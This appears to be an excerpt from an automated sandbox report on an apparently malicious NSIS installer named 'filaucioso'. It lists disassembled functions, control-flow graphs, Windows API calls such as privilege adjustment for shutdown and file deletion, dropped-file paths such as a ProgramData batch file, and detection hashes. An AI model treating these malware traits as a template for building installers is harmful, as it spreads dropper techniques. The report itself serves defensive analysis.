                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004034A5
                                                                        • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034B9
                                                                          • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                          • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                          • Part of subcall function 0040380A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,74DF3410), ref: 004038FA
                                                                          • Part of subcall function 0040380A: lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                          • Part of subcall function 0040380A: GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                          • Part of subcall function 0040380A: LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
                                                                          • Part of subcall function 0040380A: RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                          • Part of subcall function 00403730: CloseHandle.KERNEL32(000002F0,00403567,?,?,00000006,00000008,0000000A), ref: 0040373B
                                                                        • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403567
                                                                        • ExitProcess.KERNEL32 ref: 00403588
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004036A5
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036C4
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036E3
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                        • ExitProcess.KERNEL32 ref: 0040372A
                                                                          • Part of subcall function 00405709: MessageBoxIndirectA.USER32(0040A218), ref: 00405764
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                        • String ID: "$"C:\ProgramData\filaucioso.bat" $.tmp$1033$C:\ProgramData$C:\ProgramData\filaucioso.bat$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\unscorified$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens$Desalinates Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                        • API String ID: 3776617018-2470338638
                                                                        • Opcode ID: cfa449591d1369c085c6b9971d8c302c1ce6a26748ff0868a3e8a2df3d7b46b9
                                                                        • Instruction ID: 4b1384cee9ffc8e7d3909f75f513e580ba658b4e0f6039b9d7a5280b54d142a8
                                                                        • Opcode Fuzzy Hash: cfa449591d1369c085c6b9971d8c302c1ce6a26748ff0868a3e8a2df3d7b46b9
                                                                        • Instruction Fuzzy Hash: B3C1E870104741AAD7216F759D89A2F3FA8AB86306F05453FF581B61E2CB7C8A15CB2E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 134 405252-40526e 135 405274-40533b GetDlgItem * 3 call 4040b0 call 4049a1 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053fd-405403 134->136 157 405359-40535c 135->157 158 40533d-405357 SendMessageA * 2 135->158 138 405405-405427 GetDlgItem CreateThread CloseHandle 136->138 139 40542d-405439 136->139 138->139 141 40545b-405461 139->141 142 40543b-405441 139->142 146 405463-405469 141->146 147 4054b6-4054b9 141->147 144 405443-405456 ShowWindow * 2 call 4040b0 142->144 145 40547c-405483 call 4040e2 142->145 144->141 154 405488-40548c 145->154 151 40546b-405477 call 404054 146->151 152 40548f-40549f ShowWindow 146->152 147->145 149 4054bb-4054c1 147->149 149->145 159 4054c3-4054d6 SendMessageA 149->159 151->145 155 4054a1-4054aa call 405114 152->155 156 4054af-4054b1 call 404054 152->156 155->156 156->147 163 40536c-405383 call 40407b 157->163 164 40535e-40536a SendMessageA 157->164 158->157 165 4055d3-4055d5 159->165 166 4054dc-405508 CreatePopupMenu call 40600f AppendMenuA 159->166 173 405385-405399 ShowWindow 163->173 174 4053b9-4053da GetDlgItem SendMessageA 163->174 164->163 165->154 171 40550a-40551a GetWindowRect 166->171 172 40551d-405533 TrackPopupMenu 166->172 171->172 172->165 176 405539-405553 172->176 177 4053a8 173->177 178 40539b-4053a6 ShowWindow 173->178 174->165 175 4053e0-4053f8 SendMessageA * 2 174->175 175->165 180 405558-405573 SendMessageA 176->180 179 4053ae-4053b4 call 4040b0 177->179 178->179 179->174 180->180 181 405575-405595 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 180->181 183 405597-4055b7 SendMessageA 181->183 183->183 184 4055b9-4055cd GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 004052B1
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004052C0
                                                                        • GetClientRect.USER32(?,?), ref: 004052FD
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405304
                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405325
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405336
                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405349
                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405357
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040536A
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040538C
                                                                        • ShowWindow.USER32(?,00000008), ref: 004053A0
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053C1
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053D1
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053EA
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F6
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004052CF
                                                                          • Part of subcall function 004040B0: SendMessageA.USER32(00000028,?,?,00403EE0), ref: 004040BE
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405412
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000051E6,00000000), ref: 00405420
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405427
                                                                        • ShowWindow.USER32(00000000), ref: 0040544A
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405451
                                                                        • ShowWindow.USER32(00000008), ref: 00405497
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054CB
                                                                        • CreatePopupMenu.USER32 ref: 004054DC
                                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054F1
                                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405511
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040552A
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405566
                                                                        • OpenClipboard.USER32(00000000), ref: 00405576
                                                                        • EmptyClipboard.USER32 ref: 0040557C
                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405585
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040558F
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004055A3
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004055BC
                                                                        • SetClipboardData.USER32(?,00000000), ref: 004055C7
                                                                        • CloseClipboard.USER32 ref: 004055CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID:
                                                                        • API String ID: 590372296-0
                                                                        • Opcode ID: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                        • Instruction ID: e249d6b51738ec221da1a53d9ec42c2df55930041f70e6241115b0d1b6ef0d10
                                                                        • Opcode Fuzzy Hash: fe83000176ef68774a1613465f0c1fa99a691d0f6c525a9b60e7a3ca6ad1dfb2
                                                                        • Instruction Fuzzy Hash: D0A15AB1900608BFDF119F64DD85EAF7BB9FB48344F10802AFA41B61A1CB794E519F68

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 493 4057b5-4057db call 405a73 496 4057f4-4057fb 493->496 497 4057dd-4057ef DeleteFileA 493->497 499 4057fd-4057ff 496->499 500 40580e-40581e call 405fed 496->500 498 40597e-405982 497->498 501 405805-405808 499->501 502 40592c-405931 499->502 508 405820-40582b lstrcatA 500->508 509 40582d-40582e call 4059cc 500->509 501->500 501->502 502->498 504 405933-405936 502->504 506 405940-405948 call 4062f0 504->506 507 405938-40593e 504->507 506->498 516 40594a-40595e call 405985 call 40576d 506->516 507->498 511 405833-405836 508->511 509->511 514 405841-405847 lstrcatA 511->514 515 405838-40583f 511->515 517 40584c-40586a lstrlenA FindFirstFileA 514->517 515->514 515->517 532 405960-405963 516->532 533 405976-405979 call 405114 516->533 518 405870-405887 call 4059b0 517->518 519 405922-405926 517->519 526 405892-405895 518->526 527 405889-40588d 518->527 519->502 523 405928 519->523 523->502 530 405897-40589c 526->530 531 4058a8-4058b6 call 405fed 526->531 527->526 529 40588f 527->529 529->526 535 405901-405913 FindNextFileA 530->535 536 40589e-4058a0 530->536 543 4058b8-4058c0 531->543 544 4058cd-4058d8 call 40576d 531->544 532->507 538 405965-405974 call 405114 call 405dcc 532->538 533->498 535->518 541 405919-40591c FindClose 535->541 536->531 539 4058a2-4058a6 536->539 538->498 539->531 539->535 541->519 543->535 547 4058c2-4058cb call 4057b5 543->547 552 4058f9-4058fc call 405114 544->552 553 4058da-4058dd 544->553 547->535 552->535 555 4058f1-4058f7 553->555 556 4058df-4058ef call 405114 call 405dcc 553->556 555->535 556->535
                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057DE
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405826
                                                                        • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405847
                                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584D
                                                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040585E
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040590B
                                                                        • FindClose.KERNELBASE(00000000), ref: 0040591C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\ProgramData\filaucioso.bat" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa21F3.tmp$\*.*
                                                                        • API String ID: 2035342205-3984365773
                                                                        • Opcode ID: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                        • Instruction ID: eea8dcc9899e8fe382e67b4d85d328ba4a3fbbae0ab86688a1659871ceec6938
                                                                        • Opcode Fuzzy Hash: 8fda1b6a8b55d101ad800504929e014ab0da255cf75589647b7755d6ebd2940b
                                                                        • Instruction Fuzzy Hash: 4051E171800A08FADF226B618C45FAF7A78DF42728F14807BF841B51D2D73C4992DE69
                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(74DF3410,007A0D98,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,00405AB6,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,C:\Users\user\AppData\Local\Temp\nsa21F3.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004062FB
                                                                        • FindClose.KERNELBASE(00000000), ref: 00406307
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\nsa21F3.tmp, xrefs: 004062F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa21F3.tmp
                                                                        • API String ID: 2295610775-3845321688
                                                                        • Opcode ID: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                        • Instruction ID: 3919553d01c23f7351ed85dbc682ed8077fcf54d37e588a2b2de2e61cdf0a9ad
                                                                        • Opcode Fuzzy Hash: 6492e11af6876ec85f54452a190d9404ba6d94e49271ee4e7d15c167f534e484
                                                                        • Instruction Fuzzy Hash: 14D012325451205BC75017786E0C88B7A589F963717214B36F9AAF61E0CB748C238AD8

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 185 403ba7-403bb9 186 403cfa-403d09 185->186 187 403bbf-403bc5 185->187 189 403d58-403d6d 186->189 190 403d0b-403d53 GetDlgItem * 2 call 40407b SetClassLongA call 40140b 186->190 187->186 188 403bcb-403bd4 187->188 193 403bd6-403be3 SetWindowPos 188->193 194 403be9-403bec 188->194 191 403dad-403db2 call 4040c7 189->191 192 403d6f-403d72 189->192 190->189 207 403db7-403dd2 191->207 196 403d74-403d7f call 401389 192->196 197 403da5-403da7 192->197 193->194 199 403c06-403c0c 194->199 200 403bee-403c00 ShowWindow 194->200 196->197 218 403d81-403da0 SendMessageA 196->218 197->191 206 404048 197->206 202 403c28-403c2b 199->202 203 403c0e-403c23 DestroyWindow 199->203 200->199 211 403c2d-403c39 SetWindowLongA 202->211 212 403c3e-403c44 202->212 208 404025-40402b 203->208 210 40404a-404051 206->210 214 403dd4-403dd6 call 40140b 207->214 215 403ddb-403de1 207->215 208->206 220 40402d-404033 208->220 211->210 216 403ce7-403cf5 call 4040e2 212->216 217 403c4a-403c5b GetDlgItem 212->217 214->215 221 404006-40401f DestroyWindow EndDialog 215->221 222 403de7-403df2 215->222 216->210 224 403c7a-403c7d 217->224 225 403c5d-403c74 SendMessageA IsWindowEnabled 217->225 218->210 220->206 227 404035-40403e ShowWindow 220->227 221->208 222->221 223 403df8-403e45 call 40600f call 40407b * 3 GetDlgItem 222->223 255 403e47-403e4c 223->255 256 403e4f-403e8b ShowWindow KiUserCallbackDispatcher call 40409d EnableWindow 223->256 229 403c82-403c85 224->229 230 403c7f-403c80 224->230 225->206 225->224 227->206 234 403c93-403c98 229->234 235 403c87-403c8d 229->235 233 403cb0-403cb5 call 404054 230->233 233->216 238 403cce-403ce1 SendMessageA 234->238 240 403c9a-403ca0 234->240 235->238 239 403c8f-403c91 235->239 238->216 239->233 243 403ca2-403ca8 call 40140b 240->243 244 403cb7-403cc0 call 40140b 240->244 251 403cae 243->251 244->216 253 403cc2-403ccc 244->253 251->233 253->251 255->256 259 403e90 256->259 260 403e8d-403e8e 256->260 261 403e92-403ec0 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2-403ed3 SendMessageA 261->262 263 403ed5 261->263 264 403edb-403f15 call 4040b0 call 403b88 call 405fed lstrlenA call 40600f SetWindowTextA call 401389 262->264 263->264 264->207 275 403f1b-403f1d 264->275 275->207 276 403f23-403f27 275->276 277 403f46-403f5a DestroyWindow 276->277 278 403f29-403f2f 276->278 277->208 280 403f60-403f8d CreateDialogParamA 277->280 278->206 279 403f35-403f3b 278->279 279->207 281 403f41 279->281 280->208 282 403f93-403fea call 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->206 282->206 287 403fec-403fff ShowWindow call 4040c7 282->287 289 404004 287->289 289->208
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BE3
                                                                        • ShowWindow.USER32(?), ref: 00403C00
                                                                        • DestroyWindow.USER32 ref: 00403C14
                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C30
                                                                        • GetDlgItem.USER32(?,?), ref: 00403C51
                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C65
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C6C
                                                                        • GetDlgItem.USER32(?,?), ref: 00403D1A
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D24
                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D3E
                                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D8F
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E35
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403E56
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E68
                                                                        • EnableWindow.USER32(?,?), ref: 00403E83
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E99
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403EA0
                                                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403EB8
                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403ECB
                                                                        • lstrlenA.KERNEL32(0079F548,?,0079F548,00000000), ref: 00403EF5
                                                                        • SetWindowTextA.USER32(?,0079F548), ref: 00403F04
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404038
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0
                                                                        • Opcode ID: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                        • Instruction ID: b507ef7cb9582abf258fe264cbdb2372651992ce94f69c67437d7eaacc5d437d
                                                                        • Opcode Fuzzy Hash: 0a30aeb85d531018a1be584246925ac06f9566342ce983b6b2b6379f1775da4d
                                                                        • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 290 40380a-403822 call 406385 293 403824-403834 call 405f4b 290->293 294 403836-403867 call 405ed4 290->294 303 40388a-4038b3 call 403acf call 405a73 293->303 299 403869-40387a call 405ed4 294->299 300 40387f-403885 lstrcatA 294->300 299->300 300->303 308 4038b9-4038be 303->308 309 40393a-403942 call 405a73 303->309 308->309 310 4038c0-4038d8 call 405ed4 308->310 315 403950-403975 LoadImageA 309->315 316 403944-40394b call 40600f 309->316 314 4038dd-4038e4 310->314 314->309 317 4038e6-4038e8 314->317 319 4039f6-4039fe call 40140b 315->319 320 403977-4039a7 RegisterClassA 315->320 316->315 321 4038f9-403905 lstrlenA 317->321 322 4038ea-4038f7 call 4059b0 317->322 334 403a00-403a03 319->334 335 403a08-403a13 call 403acf 319->335 323 403ac5 320->323 324 4039ad-4039f1 SystemParametersInfoA CreateWindowExA 320->324 328 403907-403915 lstrcmpiA 321->328 329 40392d-403935 call 405985 call 405fed 321->329 322->321 327 403ac7-403ace 323->327 324->319 328->329 333 403917-403921 GetFileAttributesA 328->333 329->309 338 403923-403925 333->338 339 403927-403928 call 4059cc 333->339 334->327 343 403a19-403a33 ShowWindow call 406317 335->343 344 403a9c-403a9d call 4051e6 335->344 338->329 338->339 339->329 351 403a35-403a3a call 406317 343->351 352 403a3f-403a51 GetClassInfoA 343->352 347 403aa2-403aa4 344->347 349 403aa6-403aac 347->349 350 403abe-403ac0 call 40140b 347->350 349->334 353 403ab2-403ab9 call 40140b 349->353 350->323 351->352 356 403a53-403a63 GetClassInfoA RegisterClassA 352->356 357 403a69-403a8c DialogBoxParamA call 40140b 352->357 353->334 356->357 361 403a91-403a9a call 40375a 357->361 361->327
                                                                        APIs
                                                                          • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                          • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                        • lstrcatA.KERNEL32(1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\ProgramData\filaucioso.bat" ,00000000), ref: 00403885
                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\unscorified,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,74DF3410), ref: 004038FA
                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403918
                                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\unscorified), ref: 00403961
